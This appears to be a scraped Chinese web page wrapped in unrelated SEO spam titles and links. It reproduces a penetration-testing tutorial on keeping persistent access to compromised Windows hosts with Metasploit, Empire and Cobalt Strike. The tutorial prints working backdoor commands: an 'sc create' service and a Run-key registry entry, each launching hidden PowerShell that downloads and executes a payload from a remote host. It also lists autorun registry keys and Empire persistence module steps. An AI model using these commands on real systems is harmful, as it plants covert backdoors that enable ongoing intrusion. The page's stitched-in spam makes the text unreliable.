当前位置: 首页 > news >正文

网站界面设计技巧宁波seo排名优化价格

网站界面设计技巧,宁波seo排名优化价格,房地产市场信息系统网站,东方论坛0x00 前言 在渗透测试中#xff0c;有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。 那么#xff0c;通过漏洞获取到目标主机权限后#xff0c;如何利用框架获得持久性权限呢#xff1f; 0x01 MSF权限维持 使用MSF维持权限的前提是先获得一个met…0x00 前言 在渗透测试中有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。 那么通过漏洞获取到目标主机权限后如何利用框架获得持久性权限呢 0x01 MSF权限维持 使用MSF维持权限的前提是先获得一个meterpreter shell通过meterpreter shell获取持久性shell的方法有两种 Persistence模块 通过启动项启动(persistence)的方式在目标机器上以反弹回连。 -U设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数 -X设置后门在系统启动后自启动。该方式会在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。由于权限问题会导致添加失败后门将无法启动。 -S作为服务自动启动代理程序具有SYSTEM权限生成的相关文件位置 # 后门文件位置 C:\Windows\Temp C:\Users\Administrator\AppData\Local\Temp # 注册表位置 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Metsvc 模块 通过服务(metsvc)启动的方式在目标机器启动后自启动一个服务等待连接。 后门排查目标主机上开启了一个Meterpreter服务。 0x02 Empire 权限维持 Empire的persistence模块提供了18种权限维持的方法大致可以分为四类即 elevated管理权限misc杂项powerbreachuserland用户权限registry*add_netuserdeaduserbackdoor_lnkschtasks*add_sid_history*eventlog*registrywmi*debugger*resolverschtaskswmi_updater*disable_machine_acct_change*get_sspsinstall_ssp*memssp*skeleton_key* 注册表 (Empire: agents) agents (Empire: agents) interact URL3FZBV (Empire: URL3FZBV) usemodule persistence/elevated/registry* (Empire: powershell/persistence/elevated/registry) set Listener test (Empire: powershell/persistence/elevated/registry) execute因为是开机启动所以会弹个黑框之后还会弹出注册表添加的powershell启动项的框在注册表位置如下 计划任务 (Empire: agents) interact 9NZ2RWBC (Empire: 9NZ2RWBC) usemodule persistence/elevated/schtasks* (Empire: powershell/persistence/elevated/schtasks) set Listener test (Empire: powershell/persistence/elevated/schtasks) set DailyTime 22:50 (Empire: powershell/persistence/elevated/schtasks) execute在任务计划程序库可以看到-任务为Updater-启动程序如下可以到为powershell wmi (Empire: agents) interact 9NZ2RWBC (Empire: 9NZ2RWBC) usemodule persistence/elevated/wmi (Empire: powershell/persistence/elevated/wmi) set Listener test (Empire: powershell/persistence/elevated/wmi) run如何清除后门最简单的方法就是使用Autoruns选择WMI选项卡右键就可以删除恶意后门。 0x03 Cobalt Strike权限维持 通过Cobalt Strike拿到一个shell留后门的方法有很多下面介绍两种比较常见的无文件、自启动后门。 从Cobalt Strike菜单栏Attacks--Web Drive-by--Scaripted Web Delivery生成powershell后门。 根据需要可以自己选择填写所需参数默认端口是80需要注意的就是不要使用重复端口Type选择powershell。 点击Launch后返回powershell远程下载执行命令。 服务自启动后门 sc create Name binpath cmd /c start powershell.exe -nop -w hidden -c \IEX ((new-object net.webclient).downloadstring(http://192.168.28.142:8080/a))\ sc description Name Just For Test //设置服务的描述字符串 sc config Name start auto //设置这个服务为自动启动 net start Name //启动服务重启服务器后成功返回一个shell。 注册表自启动 在windows启动项注册表里面添加一个木马程序路径如 beacongetsystem beaconshell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Keyname /t REG_SZ /d C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \IEX ((new-object net.webclient).downloadstring(http://192.168.28.142:8080/a))\ /f 账号注销后重新登录界面上会出现powershell快速闪过消失成功返回shell。 注册表还有哪些键值可以设置为自启动 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon0x04 结束语 本文简单介绍了通过三大渗透框架进行权限维持的几种方法了解攻击者常用的渗透框架及后门技术有助于更好地去发现并解决服务器安全问题。
http://www.pierceye.com/news/127726/

相关文章:

  • 专业的微商城网站建设农产品网站建设计划书
  • 软件网站开发公司广告公司创意取名
  • 工业设计东莞网站建设个人网站备案网站名称
  • 网站只能用ip访问网站吗导航网站 win8风格
  • 用ps可以做网站吗制作一个网站流程
  • 做网站支付系统难度做灯笼手工简单做法
  • 合肥珍岛公司做网站推广怎么样用excel做网站
  • 大连网站建设开源广告制作行业
  • 安阳河南网站建设wordpress 建立导航
  • 电子商务网站建设 考卷wordpress替换头像
  • 石家庄的网站的公司手机wordpress加载图片慢
  • 建企业网站教程wordpress网站被黑
  • 饮料网站建设市场分析什么是seo网站优化
  • 滑动网站国家级示范建设网站
  • 做一门户网站价格个人网站制作模板图片
  • 做网站需要审核资质吗wordpress 防恶意注册
  • 怎么不花钱建网站无人售货机
  • 可以做空股票的网站thinkphp网站开发
  • 给别人做网站怎么赚钱吗专业网络推广软件
  • SOHO英文网站制作晋江网站制作
  • 启东住房和城乡建设局网站邢台网站制作报价多少钱
  • 佛山网站建设seo优化做英文的小说网站有哪些
  • 安顺建设局网站官网哪里有响应式网站企业
  • 唯品会一家做特卖的网站国家商标查询官方网站
  • 网站宝搭建网站环境做电商网站一般需要什么流程图
  • 南通网站建设团队wordpress广告产检
  • 做网站刷赞qq怎么赚钱邢台路桥建设总公司没有网站吗
  • 网站仿站教程常用外贸网站
  • 南昌市有帮做网站的吗纵横天下网站开发
  • pc网站直接转换成移动端的网站黑果云免费虚拟主机